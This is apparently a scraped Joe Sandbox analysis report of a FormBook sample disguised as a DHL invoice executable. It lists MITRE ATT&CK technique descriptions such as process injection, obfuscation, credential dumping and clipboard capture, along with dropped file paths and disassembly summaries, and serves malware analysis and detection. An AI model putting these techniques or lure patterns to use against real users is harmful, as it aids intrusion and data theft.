Opcode ID: 0d341da5c1ac7f2e080e54b2fc9f05ffbc0f437351fb5cba999194b35dfa3a12
Instruction ID: 18a99b5664acdb7d9c85ea1fe4e57af51adf76dccec83bf8e3b02fefb33409f7
Opcode Fuzzy Hash: 0d341da5c1ac7f2e080e54b2fc9f05ffbc0f437351fb5cba999194b35dfa3a12
Instruction Fuzzy Hash: A2814DB1D002699BDB31DF54CC44BEEB6B8AF48754F0041EAEA09B7290D7746E84CFA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL-INVOICE-MBV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\e216404J

C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22\liboscar.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\AutoConnectHelper.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\System.Runtime.Extensions.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\underexposures\Teoretiseret\moeurs\Terrestriske.bmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
DHL-INVOICE-MBV.exe

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 74112A74 Relevance: 3.2, APIs: 2, Instructions: 156
nativeCOMMON

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403974 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre